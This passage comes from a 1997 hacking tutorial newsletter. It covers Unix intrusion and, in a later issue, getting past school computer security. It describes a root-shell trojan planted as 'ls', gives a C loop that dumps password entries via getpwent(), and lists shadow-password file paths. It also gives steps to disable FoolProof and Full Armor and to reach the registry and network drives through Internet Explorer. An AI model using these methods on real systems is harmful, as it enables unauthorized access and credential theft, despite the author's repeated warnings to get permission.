For example, on a Unix shell account you might put a Trojan in your home directory named “ls.” Then you tell tech support that there is something funny going on in your home directory. If the tech support guy is sufficiently clueless, he may go into you account while he has root permission. He then gives the command “ls” to see what’s there. According to Damien Sorder, “This will only work depending
on his 'PATH' statement for his shell. If he searches '.' before '/bin', then it will work. Else, it won't.”Presuming the sysadmin has been this careless, and if your Trojan is well written, it will call the real ls program to display your file info -- while also spawning a root shell for your very own use!
***************************************************
Newbie note: if you can get into a root shell you can do anything -- ANYTHING -- to your victim computer. Alas, this means it is surprisingly easy to screw up a Unix system while operating as root. A good systems administrator will give him or herself root privileges only when absolutely necessary to perform a task. Trojans are only one of the many reasons for this caution. Before you invite your friends to hack your box, be prepared for anything, and I mean ANYTHING, to get messed up even by the most well-meaning of friends.
***************************************************Another attack is to install a sniffer program on an Internet host and grab passwords. What this means is any time you want to log into a computer from another computer by using telnet, your password is at the mercy of any sniffer program that may be installed on any computer through which your password travels.
However, to set up a sniffer you must be root on the Unix box on which it is installed. So this attack is clearly not for the beginner.
To get an idea of how many computers “see” your password when you telnet into your remote account, give the command (on a Unix system) of “traceroute my.computer” (it’s “tracert” in Windows 95) where you substitute the name of the computer you were planning to log in on for the “my.computer.”
Sometimes you may discover that when you telnet from one computer to another even within the city you live in, you may go through a dozen or more computers! For example, when I trace a route from an Albuquerque AOL session to my favorite Linux box in Albuquerque, I get:
C:\WINDOWS>tracert fubar.com
Tracing route to fubar.com [208.128.xx.61]
over a maximum of 30 hops:1 322 ms 328 ms 329 ms ipt-q1.proxy.aol.com [152.163.205.95]
2 467 ms 329 ms 329 ms tot-ta-r5.proxy.aol.com [152.163.205.126]
3 467 ms 323 ms 328 ms f4-1.t60-4.Reston.t3.ans.net [207.25.134.69]
4 467 ms 329 ms 493 ms h10-1.t56-1.Washington-DC.t3.ans.net [140.223.57
.25]
5 469 ms 382 ms 329 ms 140.222.56.70
6 426 ms 548 ms 437 ms core3.Memphis.mci.net [204.70.125.1]
7 399 ms 448 ms 461 ms core2-hssi-2.Houston.mci.net [204.70.1.169]
8 400 ms 466 ms 512 ms border7-fddi-0.Houston.mci.net [204.70.191.51]
9 495 ms 493 ms 492 ms american-comm-svc.Houston.mci.net [204.70.194.86
]
10 522 ms 989 ms 490 ms webdownlink.foobar.net [208.128.37.98]
11 468 ms 493 ms 491 ms 208.128.xx.33
12 551 ms 491 ms 492 ms fubar.com [208.128.xx.61]If someone were to put a sniffer on any computer on that route, they could get my password! Now do you want to go telneting around from one of your accounts to another?
A solution to this problem is to use Secure Shell. This is a program you can download for free from http://escert.upc.es/others/ssh/. According to the promotional literature, “Ssh (Secure Shell) is a program to log into another computer over a network, to execute commands in a remote machine, and to move files from one machine to another. It provides strong authentication
and secure communications over insecure channels.”If you want to get a password on a computer that you know is being accessed remotely by people using Windows 3.X, and if it is using Trumpet Winsock, and if you can get physical access to that Windows box, there is a super easy way to uncover the password. You can find the details, which are so easy they will blow your socks off, in the Bugtraq archives. Look for an entry titled “Password problem in Trumpet Winsock.” These archives are at http://www.netspace.org/lsv-archive/bugtraq.html
Another way to break into a computer is to get the entire password file. Of course the password file will be encrypted. But if your target computer doesn’t run a program to prevent people from picking easy passwords, it is easy to decrypt many passwords.
But how do you get password files? A good systems administrator will hide them well so even users on the machine that holds them can’t easily obtain the file.
The simplest way to get a password file is to steal a backup tape from your victim. This is one reason that most computer breakins are committed by insiders.
But often it is easy to get the entire password file of a LAN remotely from across the Internet. Why should this be so? Think about what happens when you log in. Even before the computer knows who you are, you must be able to command it to compare your user name and password with its password file.
What the computer does is perform its encryption operation on the password you enter and then compare it with the encrypted entries in the password file. So the entire world must have access somehow to this encrypted password file. You job as the would-be cracker is to figure out the name of this file and then get your target computer to deliver this file to you.
A tutorial on how to do this, which was published in the ezine K.R.A.C.K (produced by od^pheak <butler@tir.com>), follows. Comments in brackets have been added to the K.R.A.C.K. text.
*********************************************
Strategy For Getting Root With a shadowed Passwdstep#1
anonymous ftp into the server get passwd
[This step will almost never work, but even the simplest attack may be worth a try.]
step #2
To defeat password shadowing on many (but not all) systems, write a program that uses successive calls to getpwent() to obtain the password file.
Example:
#include <pwd.h>
main()
{
struct passwd *p;
while(p=3Dgetpwent())
printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name,
p->pw_passwd,
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir,
p->pw_shell);
}Or u can Look for the Unshadowed Backup.....
[The following list of likely places to find the unshadowed backup is available from the “Hack FAQ” written by Voyager. It may be obtained from http://
www-personal.engin.umich.edu/~jgotts/hack-faq]Unix Path needed Token
----------------------------------------------------------------------
AIX 3 /etc/security/passwd !
or /tcb/auth/files/<first letter #
of username>/<username>
A/UX 3.0s /tcb/files/auth/?/ *
BSD4.3-Reno /etc/master.passwd *
ConvexOS 10 /etc/shadpw *
ConvexOS 11 /etc/shadow *
DG/UX /etc/tcb/aa/user/ *
EP/IX /etc/shadow x
HP-UX /.secure/etc/passwd *
IRIX 5 /etc/shadow x
Linux 1.1 /etc/shadow *
OSF/1 /etc/passwd[.dir|.pag] *
SCO Unix #.2.x /tcb/auth/files/<first letter *
of username>/<username>
SunOS4.1+c2 /etc/security/passwd.adjunct =
##username
SunOS 5.0 /etc/shadow
<optional NIS+ private secure
maps/tables/whatever>
System V Release 4.0 /etc/shadow x
System V Release 4.2 /etc/security/* database
Ultrix 4 /etc/auth[.dir|.pag] *
UNICOS /etc/udb =20
Step #3
crack it
[See below for instructions on how to crack a password file.]
**************************************************
So let’s say you have managed to get an encrypted password file. How do you extract the passwords?
An example of one of the many programs that can crack poorly chosen passwords is Unix Password Cracker by Scooter Corp. It is available at
ftp://ftp.info.bishkek.su/UNIX/crack-2a/crack-2a.tgz
or http://iukr.bishkek.su/crack/index.htmlA good tutorial on some of the issues of cracking Windows NT passwords may be found at
http://ntbugtraq.rc.on.ca/samfaq.htmOne password cracker for Windows NT is L0phtcrack v1.5. It is available for FREE from http://www.L0pht.com (that's a ZERO after the 'L', not an 'o'). It comes with source so you can build it on just about any platform. Authors are mudge@l0pht.com and weld@l0pht.com.
Another Windows NT password cracker is Alec Muffett's
Crack 5.0 at http://www.sun.rhbnc.ac.uk/~phac107/c50a-nt-0.10.tgzEven if you crack some passwords, you will still need to correlate passwords with user names. One way to do this is to get a list of users by fingering your target computer. See the GTMHH Vol.1 No.1 for some ways to finger as many users as possible on a system. The verify command in sendmail is another way to get user names. A good systems administrator will turn off both the finger daemon and the sendmail verify command to make it harder for outsiders to break into their computers.
If finger and the verify commands are disabled, there is yet another way to get user names. Oftentimes the part of a person’s email that comes before the “@” will also be a user name.
If password cracking doesn’t work, there are many -- way too many -- other ways to break into a computer. Following are some suggestions on how to learn these techniques.
1. Learn as much as you can about the computer you have targeted. Find out what operating system it runs; whether it is on a local area network; and what programs it is running. Of special importance are the ports that are open and the daemons running on them.
For example, if you can get physical access to the computer, you can always get control of it one way or another. See the GTMHHs on Windows for many examples. What this means, of course, is that if you have something on your computer you absolutely, positively don’t want anyone to read, you had better encrypt it with RSA. Not PGP, RSA. Then you should hope no one discovers a fast way to factor numbers (the mathematical Achilles Heel of RSA and PGP).
If you can’t get physical access, your next best bet is if you are on the same LAN. In fact, the vast majority of computer breakins are done by people who are employees of the company that is running that LAN on which the victim computer is attached. The most common mistake of computer security professionals is to set up a firewall against the outside world while leaving their LAN wide open to insider attack.
Important note: if you have even one Windows 95 box on your LAN, you can’t even begin to pretend you have a secure network. That is in large part because it will run in DOS mode, which allows any user to read, write and delete files.
If the computer you have targeted is on the Internet, your next step would be to determine how it is connected to the Internet. The most important issue here is what TCP/IP ports are open and what daemons run on these ports.
***************************************************
Newbie note: TCP/IP ports are actually protocols used to direct data into programs called “daemons” that run all the time an Internet host computer is turned on and connected to the Net, waiting for incoming or outgoing data to spur it into action.An example of a TCP/IP port is number 25, called SMTP (simple mail transport protocol). An example of a daemon that can do interesting things when it gets data under SMTP is sendmail. See the GTMHH on forging email for examples of fun ways to play *legally* with port 25 on other people’s computers.
For a complete list of commonly used TCP/IP ports, see RFC 1700. One place you can look this up is http://ds2.internic.net/rfc/rfc1700.txt
****************************************************2. Understand the operating system of the computer you plan to crack. Sure, lots of people who are ignorant on operating systems break into computers by using canned programs against pitifully vulnerable boxes. As one teen hacker told me after returning from Def Con V, “Many of the guys there didn’t even know the ‘cat’ command!”
Anyone can break into some computer somewhere if they have no pride or ethics. We assume you are better than that. If the breakin is so easy you can do it without having a clue what the command “cat” is, you aren’t a hacker. You’re just a computer vandal.
3. Study the ways other people have broken into a computer with that operating system and software. The best archives of breakin techniques for Unix are Bugtraq http://www.netspace.org/lsv-archive/bugtraq.html. For Windows NT, check out http://ntbugtraq.rc.on.ca/index.html.
A cheap and easy partial shortcut to this arduous learning process is to run a program that scans the ports of your target computer, finds out what daemons are running on each port, and then tells you whether there are breakin techniques known to exist for those daemons. Satan is a good one, and absolutely free. You can download it from ftp://ftp.fc.net/pub/defcon/SATAN/ or a bazillion other hacker ftp sites.
Another great port scanner is Internet Security Scanner. It is offered by Internet Security Systems of Norcross, Georgia USA, 1-800-776-2362. This tool costs lots of money, but is the security scanner of choice of the people who want to keep hackers out. You can reach ISS at http://www.iss.net/.
Internet Security Systems also offers some freebie programs. The "Localhost" Internet Scanner SAFEsuite is set to only run a security scan on the Unix computer on which it is installed (hack your on box!) You can get it from http://www.blanket.com/iss.html. You can get a free beta copy of their scanner for Win NT at http://www.iss.net/about/whatsnew.html#RS_NT.
In theory ISS programs are set so you can only use them at most to probe computer networks that you own. However, a few months ago I got a credible report that a giant company that uses ISS to test its boxes on the Internet backbone accidentally shut down an ISP in El Paso with an ISS automated syn flood attack.
If you want to get a port scanner from a quiet little place, try out http://204.188.52.99. This offers the Asmodeus Network Security Scanner for Windows NT 4.0.
In most places it is legal to scan the ports of other people’s computers. Nevertheless, if you run Satan or any other port scanning tool against computers that you don’t have permission to break into, you may get kicked off of your ISP.
For example, recently an Irish hacker was running “security audits” of the Emerald Island’s ISPs. He was probably doing this in all sincerity. He emailed each of his targets a list of the vulnerabilities he found. But when this freelance security auditor probed the ISP owned by one of my friends, he got that hacker kicked off his ISP.
“But why give him a hard time for just doing security scans? He may have woken up an administrator or two,” I asked my friend.
“For the same reason they scramble an F-16 for a bogie,” he replied.
The way I get around the problem of getting people mad from port scanning is to do it by hand using a telnet program. Many of the GTMHHs show examples of port scanning by hand. This has the advantage that most systems administrators assume you are merely curious.
However, some have a daemon set up so that every time you scan even one port of their boxes, it automatically sends an email to the systems administrator of the ISP you use complaining that you tried to break in -- and another email to you telling you to turn yourself in!
The solution to this is to use IP spoofing. But since I’m sure you are only going to try to break into computers where you have permission to do so, you don’t need to know how to spoof your IP address.
******************************************************
You may laugh yourself silly warning: If you port scan by hand against obscure.sekurity.org, you may run into some hilarious daemons installed on weird high port numbers.
******************************************************4. Now that you know what vulnerable programs are running on your target computer, next you need to decide what program you use to break in.
But aren’t hackers brilliant geniuses that discover new ways to break into computers? Yes, some are. But the average hacker relies on programs other hackers have written to do their deeds. That’s why, in the book Takedown, some hacker (maybe Kevin Mitnick, maybe not) broke into Tsutomu Shimomura’s computer to steal a program to turn a Nokia cell phone into a scanner that could eavesdrop on other people’s cell phone calls.
This is where those zillions of hacker web pages come into play. Do a web search for “hacker” and “haxor” and “h4ck3r” etc. You can spend months downloading all those programs with promising names like “IP spoofer.”
Unfortunately, you may be in for an ugly surprise or two. This may come as a total shock to you, but some of the people who write programs that are used to break into computers are not exactly Eagle Scouts.
For example, the other day a fellow who shall remain nameless wrote to me “I discovered a person has been looting my www dir, where I upload stuff for friends so I am gonna leave a nice little surprise for him in a very cool looking program ;) (if you know what I mean)”
But let’s say you download a program that promises to exploit that security hole you just found with a Satan scan. Let’s say you aren’t going to destroy all your files from some nice little surprise. Your next task may be to get this exploit program to compile and run.
Most computer breakin programs run on Unix. And there are many different flavors of Unix. For each flavor of Unix you can mix or match several different shells. (If none of this makes sense to you, see the GTMHHs on how to get a good shell account.) The problem is that a program written to run in, for example, the csh shell on Solaris Unix may not run from the bash shell on Slackware Linux or the tcsh shell on Irix, etc.
It is also possible that the guy who wrote that breakin program may have a conscience. He or she may have figured that most people would want to use it maliciously. So they made a few little teeny weeny changes to the program, for example commenting out some lines. So Mr./Ms. Tender Conscience can feel that only people who know how to program will be able to use that exploit software. And as we all know, computer programmers would never, ever do something mean and horrible to someone else’s computer.
So this brings us to the next thing you should know in order to break into computers.
5. Learn how to program! Even if you use other peoples’ exploit programs, you may need to tweak a thing or two to get them to run. The two most common languages for exploit programs are probably C (or C++) and Perl.
********************************************
Newbie note: If you can’t get that program you just downloaded to run, it may be that it is designed to run on the Unix operating system, but you are running Windows. A good tip off that this may be your problem is a file name that ends with “.gz”.
********************************************So, does all this mean that breaking into computers is really, really hard? Does all this mean that if you break into someone’s computer you have proven your digital manhood (or womanhood)?
No. Some computers are ridiculously easy to break into. But if you break into a poorly defended computer run by dunces, all you have proven is that you lack good taste and like to get into really stupid kinds of trouble. However, if you manage to break into a computer that is well managed, and that you have permission to test, you are on your way to a high paying career in computer security.
Remember this! If you get busted for breaking into a computer, you are in trouble big time. Even if you say you did no harm. Even if you say you made the computer better while you were prowling around in it. And your chances of becoming a computer security professional drop almost to zero. And -- do you have any idea of how expensive lawyers are?
I haven’t even hinted in this tutorial at how to keep from getting caught. It is at least as hard to cover your tracks as it is to break into a computer. So if you had to read this to learn how to break into computers, you are going to wind up in a world of hurt if you use this to trespass in other people’s computers.
So, which way do you plan to go? To be known as a good guy, making tons of money, and having all the hacker fun you can imagine?
Or are you going to slink around in the dark, compulsively breaking into strangers’’ computers, poor, afraid, angry? Busted? Staring at astronomical legal bills?
If you like the rich and happy alternative, check out back issues of the Happy Hacker Digests to see what computers are open to the public to try to crack into. We’ll also make new announcements as we discover them.
And don’t forget to try to crack obscure.sekurity.org. No one has managed to break it when attacking from the outside. I don’t have a clue of how to get inside it, either. You may have to discover a new exploit to breach its defenses.
But if you do, you will have experienced a thrill that is far greater than breaking into some Lower Slobovian businessman’s 386 box running Linux 2.0 with sendmail 4.whatever. Show some chivalry and please don’t beat up on the helpless, OK? And stay out of jail or we will all make fun of you when you get caught.
Of course this Guide barely scrapes the surface of breaking into computers. We haven’t even touched on topics such as how to look for back doors that other crackers may have hidden on your target computer, or keystroke grabbers, or attacks through malicious code you may encounter while browsing the Web. (Turn off Java on your browser! Never, ever use Internet Explorer.) But maybe some of you ubergenius types reading this could help us out. Hope to hear from you!
____________________________________________________________
Warning! Use this information at your own risk. Get busted for trying this out on some Lower Slobovian businessman’s computer and we will all make fun of you, I promise! That goes double for Upper Slobovian boxes!!
Want to see back issues of Guide to (mostly) Harmless Hacking? See http://goodweb.scol.net/hacker/index.html(the official Happy Hacker archive site).
Subscribe to our discussion list by emailing to hacker@techbroker.com with message "subscribe"
Want to share some kewl stuph with the Happy Hacker list? Correct mistakes? Send your messages to list@techbroker.com. To send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com and be sure to state in your message that you want me to keep this confidential. If you wish your message posted anonymously, please say so! Direct flames to dev/null@techbroker.com. Happy hacking! _____________________________________________________
Copyright 1997 Carolyn P. Meinel. You may forward or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end. To subscribe, email hacker@techbroker.com with message “subscribe hh.”
________________________________________________________
____________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 3 No. 6
How to Be a Hero in Computer Lab
____________________________________________________________If you are a student, you know you can get into trouble if you hack your school’s computers. But if you can persuade your teachers that you are the good guy who will help protect them from digital vandals, you can become a hero. You may even get their permission to try break-in techniques.
************************************************************
In this Guide you will learn how to:
· Customize the animated logo on Internet Explorer
· Circumvent security programs through Internet Explorer
· Circumvent security programs through any Microsoft Office programs
· Circumvent FoolProof
· Circumvent Full Armor
· Solve the web babysitter problem
· Break into absolutely any school computer.
· Keep clueless kiddie hackers from messing up your school computer system
************************************************************This Guide will give you some tips for safely proving just how good you are, and maybe even showing your hacker teacher buddies a thing or two. But I would feel really bad if someone were to use the tips in this Guide to mess up his or her life.
************************************************************
You can mess up your life warning: In most countries kids don’t have nearly the legal protections that adults have. If you get involved in a hacker gang at school and you guys get caught, you can easily get expelled from school or even arrested. Even if the authorities don’t have very good proof of your guilt. Even if you are innocent. Arghhh!
************************************************************First task of this Guide, then, is how to find teachers who would love to play hacker games with you and give you free run of the schools computer systems. Whoa, you say, now this is some social engineering challenge! But actually this isn’t that hard.
Coyote suggests, “in many cases you may find that if you prove yourself responsible (i.e.: not acting like a jerk in class and not hacking to be cool), it will be easier to gain the trust of the teacher and subsequently gain the job helping with the systems. And once you reach this level you are almost guaranteed that you will know more about
system management, and of course hacking, than you could have by simply
breaking in.”Here’s the first thing you need to remember. Your teachers are overworked. If they get mad at hackers, it is because computer vandals keep on messing things up. Guess who gets to stay late at work fixing the mess students make when they break into school computers? Right, it’s usually your computer lab teachers.
Think about it. Your computer lab teachers might really, really, like the idea of having you help with the work. The problem is -- will they dare to trust you?
Karl Schaffarczyk warns, “I nearly got chucked out of school (many years ago) for pulling up a DOS prompt on a system that was protected against such things.” Sheesh, just for getting a DOS prompt? But the problem is that your teachers go to a lot of effort to set school computers up so they can be used to teach classes. The minute they realize you know how to get to DOS, they know you could mess things up so bad they will have to spend a sleepless night -- or two or three -- putting that computer back together. Teachers hate to stay up all night. Imagine that!
So if you really want to work a deal where you become supreme ruler and hero-in-chief of your school’s computers, don’t start by getting caught! Don’t start even by showing your teacher, “Hey, look how easy it is to get a DOS prompt!” Remember, some authorities will immediately kick you out of school or call the cops.
Honest, many people are terrified of teenage hackers. You can’t really blame them, either, when you consider those news stories. Here are some examples of stories your school authorities have probably read.
- 13 FEBRUARY 1997 Hackers are reported to be using servers at Southampton University to circulate threatening emails (that) ... instruct recipients to cancel credit cards, claiming their security has been breached.
(c) VNU Business Publications Limited, 1997
NETWORK NEWS 7/5/97 P39 A teenager was fined an equivalent of US$350 for paralysing US telephone switchboards...The unnamed teenager made around 60,000 calls...
(C) 1997 M2 Communications Ltd.
TELECOMWORLDWIRE 6/5/97
WORLDCOM in the UK recently suffered a systems failure following a hacker attack...
(C) 1997 M2 Communications Ltd.
TELECOMWORLDWIRE 6/5/97
Scary, huh? It’s not surprising that nowadays some people are so afraid of hackers that they blame almost anything on us. For example, in 1997, authorities at a naval base at first blamed attackers using high-energy radio waves for computer screens that froze. Later investigators learned that ship radars, not hackers, were freezing screens.So instead of getting mad at teachers who are terrified of hackers, give them a break. The media is inundating them with scare stories. Plus which they have probably spent a lot of time fixing messes made by kiddie hackers. Your job is to show them that you are the good guy. Your job is to show them you can make life better for them by giving you free run of the school computers.
This same basic technique also will work with your ISP.
If you offer to help for free, and if you convince them you are responsible, you can get the right to have root (or administrative) access to almost any computer system. For example, I was talking with the owner of the ISP one day, who complained how overworked he was. I told him I knew a high school sophomore who had been busted for hacking but had reformed. This fellow, I promised, would work for free in exchange for the root password on one of his boxes. Next day they did the deal.
Now this hacker and his friends get to play break-in games on this computer during off hours when paying customers don’t use it. In exchange, those kids fix anything that goes wrong with that box.So try it. Find an overworked teacher. Or overworked owner of an ISP. Offer to show him or her that you know enough to help take care of those computers.
But how do you prove you know enough for the job?
If you start out by telling your computer lab teacher that you know how to break into the school computers, some teachers will get excited and suspend you from school. Just in case your teacher is the kind who gets scared by all those hacker news stories, don’t start out by talking about breaking in! Instead, start with showing them, with their permission, a few cheap tricks.
Cheap Internet Explorer Tricks
A good place to start is with Internet Explorer.
For starters, what could be more harmless -- yet effective at showing off your talents -- than changing the animated logos on IE (IE) and Netscape?
You could do it the easy way with Microangelo, available from ftp://ftp.impactsoft.com/pub/impactsoft/ma21.zip. But since you are a hacker, you may want to impress your teachers by doing it the hacker way.
1) Bring up Paint.
2) Click “image,” then “attributes.”
3) Choose width = 40, height=480, units in pels.
4) Make a series of pictures, each 40x40 pels. One way to do this is to open a new picture for each one and set attributes to width = 40 and height = 40. Then cut and paste each one into the 40x480 image.
5) Make the top 40x40 image be the one you want to have sit there when IE is doing nothing. The next three are shown once when a download starts, and the rest are played in a loop until the download is done. You must have an even number of images for this to work.
6)Now run the Registry editor. This is well hidden since Microsoft would prefer that you not play with the Registry. One way is to click “start,” then “programs” then “MS-DOS,” and then in the MS-DOS window with the C:\windows prompt give the command “regedit.”
7) Click to highlight the subkey "HKEY_CURRENT_USER\Software\Microsoft\IE\Toolbar"
8) On the task bar above, click “Edit,” then “Find.” Type “Brandbitmap” in the find window.
9) Now double click on BrandBitmap to get a dialog window. Type the path and file name of your custom animated graphic into it.So let’s say you set up a flaming skull that rotates when you run IE. Your teacher is impressed. Now she wants you to put it back the way it was before. This is easy. Just open up BrandBitmap, and delete the name of your animation file. Windows Explorer will then automatically revert to the saved graphic in BackBitmap.
Let’s now show your teacher something that is a little bit scary. Did you know that Internet Explorer (IE) can be used to break some Windows babysitter programs? Your school might be running one of them. If you play this right, you can win points by trashing that babysitter program.
Yes, you could just get to work on those babysitter programs using the tips of the GTMHH on how to break into Win95. However, we will also look at a new way to get around them in this chapter, using IE. The advantage of using IE when your teacher is anxiously looking over your shoulder is that you could just “accidentally” stumble on some cool stuff, instead of looking like a dangerous hacker. Then you could show that you know how to take advantage of that security flaw.
Besides, if it turns out the security program you try to override is well enough written to keep IE from breaking it, you don’t look like a dummy.
************************************************************
Evil Genius tip: People are less afraid of you if you type sloowwwlllllyyyyyyyyyy.
************************************************************The dirty little secret is that IE actually is a Windows shell program. That means it is an alternative to the Win95 desktop. From IE you may launch any program. IE operates much like the Program Manager and Windows Explorer that come with the Win 95 and Win NT operating systems.
Yes, from the IE shell you can run any program on your computer -- unless the security program you are trying to break has anticipated this attack. With a little ingenuity you may be able to even gain control of your school’s LAN. But don’t try that just yet!************************************************************
Newbie note: A shell is a program that mediates between you and the operating system. The big deal about IE being a Windows shell is that Microsoft never told anyone that it was in fact a shell. The security problems that are plaguing IE are mostly a consequence of it turning out to be a shell. By contrast, the Netscape and Mosaic Web browsers are not quite such full-featured shells. This makes them safer to use. But you can still do some interesting things with them to break into a Win95 box. Experiment and have fun!
************************************************************To use IE as a Win95 shell, bring it up just like you would if you were going to surf the Web. If your computer is set to automatically initiate an Internet connection, you can kill it. You don’t need to be online for this to work.
Now here are a few fun suggestions. In the space where you would normally type in the URL you want to surf, instead type in c:.
Whoa, look at all those file folders that come up on the screen. Now for fun, click “Program Files” then click “Accessories” then click “Paint.” All of a sudden Paint is running. Now paint your teacher who is watching this hack surprised.
Next close all that stuff and get back to the URL window in IE. Click on the Windows folder, then click on Regedit.exe to start it up. Export the password file (it’s in HKEY_CLASSES_ROOT). Open it in Word Pad. Remember, the ability to control the Registry of a server is the key to controlling the network it serves. Show this to your teacher and tell her that you’re going to use IE to change all the school’s password files. In a few hours the Secret Service will be fighting with the FBI on your front lawn over who gets to try to bust you. OK, only kidding here.
No, maybe it would be a bit better to tell your teacher that if you can edit the registry, you can get total control over that computer. And maybe much more. Suggest that the school delete IE from all its computers. You are on the road to being a hero.If you actually do edit the Registry, you had better know how to revert to its backup, or else undo your changes. Otherwise you will be making more work for the computer lab teacher instead of less work. Remember, the objective is to prove to your teachers you can cut how much work they have to do!
What if the school babysitter program won’t let you run regedit.exe? Try typing c:/command.com. Then see Chapter 2 for how to edit the Registry from DOS.
If you have gotten this far with IE, next try entering r:/ or w:/ or z: etc. to see if you can access the disk of a network server. Be sure to do this with your teacher watching and with her permission to try to access network computers. If you succeed, now you have a really good reason to ask her to take IE off all the school computers. This is because you have just taken over the entire school LAN. But you are a hero because you have done it to save your school from those mean kiddie hackers who change grades and class assignments.
By now you have a great shot at getting a volunteer job running the school’s computer systems. Before you know it, you and your friends will be openly playing Quake at school -- and the authorities will consider it a small price to pay for your expertise.
Cheap Tricks with Microsoft Office
You also can run a Windows shell from several Microsoft Office programs. Remember, once you get a shell, you have a good shot at disabling security programs.
The following exploit works with Microsoft Word, Excel, and Powerpoint. To use them get into a Windows shell:
1) Click “help”, then “About Microsoft (name of program inserted here),” then “System Info...”
2) This brings up a window which includes a button labeled “run.” Click “run” and put in anything you want, for example regedit.exe! (That is, unless the security program you are trying to break has a way to disable this.)Microsoft Access is a bit harder. The “run” button only gives a few choices. One of them is File Manager. But File Manager is also a Windows shell. From it you can run any program. (That is, unless the security program you are trying to break has a way to disable this.)
How to Circumvent FoolProof
There is usually a hotkey to turn off FoolProof. One young hacker reports his school uses shift-alt-X (hold down the shift and alt keys at the same time, then press the “x” key.) Of course other schools may have other arrangements.If you get the hotkey right, a sound may play, and a lock in the lower-right corner should open for 20-30 seconds.
Dante tells how he managed to get out of a hot spot with an even better hack of Fool Proof. “My computer science teacher asked me to show her exactly HOW I managed to print the ‘the universe revolves around me’ image I made to all the network printers in the school...” So he had her watch while he did the deed.************************************************************
You can get punched in the nose warning: Dante was lucky that his teacher was understanding. In some schools a harmless joke like this would be grounds for expulsion.
************************************************************Here is how Dante -- and anyone -- may disable FoolProof.
1) First, break into the Windows box using one of the techniques of the GTMHHs on Hacking Windows. Warning -- don’t try the soldering iron bit. Your teacher will faint.
3) Now you can edit the autoexec.bat and config.sys files. (Be sure to back them up.) In config.sys delete the line device=fp, and in autoexec.bat, delete fptsr.exe.
4) Run regedit.exe. You have to remove FoolProof from the Registry, too. Use the Regedit search feature to find references to Fool Proof.
5) Find the Registry backup files and make copies with different names just in case. Making a mistake with the Registry can cause spectacular messes!
6) Save the registry, and reboot. FoolProof won’t load.
7) To put things back the way they were, rename the backup files.
You are now the school hero security expert.How to Circumvent Full Armor
“I ran up against this program 8 months ago at school, they
attempted to prevent people from writing to the hard drive. It presented
itself as a challenge....for about 5 minutes.” -- Dave Manges.Here’s how Dave tells us he did the deed:
1) In the properties of the program it mentions the thread file (can't remember the name of the file) it was something.vbx
2) OK...this is easy enough, open notepad, open something.vbx
3) Just because I can't write to the hard drive doesn't mean I can't edit something already there, delete the first character from the file.
4) The file (opened in notepad) looks like garbage, but if memory serves the first letter was M.
5) Save the File and restart the computer, it should come up with an error like "Unable to Initialize Full Armor".
6) Now you can go into add/remove programs and uninstall it.Again, remember to back up all files before changing them so you can put the computer back the way you found it.
Solve the Web Babysitter Problem
Suppose your next goal is to get rid of Web babysitter programs. But this can be a tough job. Think about it from the point of view of the teachers. If even one kid were to complain to her parents that she had seen dirty movies running on other kid’s monitors in computer lab, your school would be in big trouble. So merely blasting your way through those babysitter programs with techniques such as those you learned in Chapter 2 will solve the problem for only a short time -- and get you and your teacher and your school in trouble.
But once again you can be a hero. You can help your teachers discover the Web sites that are being blocked by those babysitter programs. They may be surprised to find out the block lots more than naughty pictures. They often secretly censor certain political sites, too.
If your school is running CYBERsitter, you can really beat up on it. CYBERsitter has encrypted its list of banned sites, which include those with political beliefs they don’t like. But you can download a program to decrypt this list at: http://peacefire.org/info/hackTHIS.shtml. (This Web site is maintained by a teen organization, Peacefire, devoted to freedom of speech.)
When your teacher discovers the hidden political agenda of CYBERsitter, you are a hero. Unless, of course, your teacher agrees with CYBERsitter’s tactics. If so, you can probably find other teachers in your school who will be appalled by CYBERsitter.How about IE’s built-in site blocking system? It is harder to uncover what it blocks because it works by limiting the viewer to web sites that have “certificates” provided by a number of organizations. If a site hasn’t gone to the effort of getting a certificate, IE can keep you from seeing it.
Of course, after reading Chapter 2, you can quickly disable the IE censorship feature. But instead of doing this, how about directing your teacher to http://peacefire.org and let him or her follow the links? Then perhaps the authorities at your school will be ready to negotiate with you to find a way to give you freedom to surf without grossing out other kids in the computer lab or library who can’t help but notice what may be on your monitor.
How to Break into Absolutely any School Computer
As you know from Chapter 2, you can break into any computer to which you have physical access. The trick is to figure out, once you have complete control, how to disable whatever program is giving you a hard time.
There are only a few possible ways for these programs to work. Maybe all you need to do is control-alt-delete and remove it from the list of active programs that brings up.
If this doesn’t work, if you can get into DOS, you can edit any files. See Chapter 1 for details how all the ways to get to DOS. Or you may only need to access regedit.exe. You can run it from either DOS or, depending on how good your problem program is, from Windows.
Once you can edit files, the ones you are likely to need to alter are autoexec.bat, config.sys, anything with the extension .pwl or .lnk, \windows\startm~1\programs\startup, and the Registry. Look for lines with suspicious names that remind you of the name of the program you want to disable.
***********************************************************
You can get punched in the nose note: Of course you could do something obvious like “format c:” and reinstall only what you want on that box. But this will make your teachers throw fits. Mega fits. If you want to be a hero, make sure that you can always return any school computer to the way it was before you hacked it.
***********************************************************When you are done, turn the victim computer off and then back on again instead of a reboot with power still on. This will get rid of anything lingering in RAM that could defeat your efforts.
Keep Clueless Kiddie Hackers from Messing up Your School Computers
Now that you have shown your teachers that you can break absolutely any security on any box to which you have physical access, what next? Do you just leave your teachers feeling awed and helpless? Or do you help them?
There is a reason why they have security systems on your school’s computers. You would be amazed at all the things clumsy or malicious users can do.
You can do your school a world of good by using your hacking skills to fix things so that security works much better. Here are some basic precautions that you can offer to your teachers to lock down school computers. (See the GTMHH on how to break into Windows computers for instructions on how to do most of these.)
1) Disable all boot keys.
2) Password the CMOS. If it already has a password, change it. Give your teacher the new password.
3) Remove any programs that allow the user to get to regedit or dos.
4) Programs that allow hot keys to circumvent security should be changed, if possible, to disable them.
5) Remove programs that can’t be made safe.
6) Don’t make it possible for Win95 computers to access sensitive data on a network disk. (The passwords can be easily grabbed and decoded.)
7) Try really, really hard to persuade the school administration to replace Win95 with WinNT.With experimentation you will figure out much more for yourself.
Since Win95 is a totally insecure operating system, this will be a losing battle. But at least you will be able to keep secure enough that those students who do break in will know enough to not do anything disastrous by accident. As for malicious school hackers, sigh, there will always be kewl d00dz who think “format c:” shows they are, ahem, kewl d00dz.
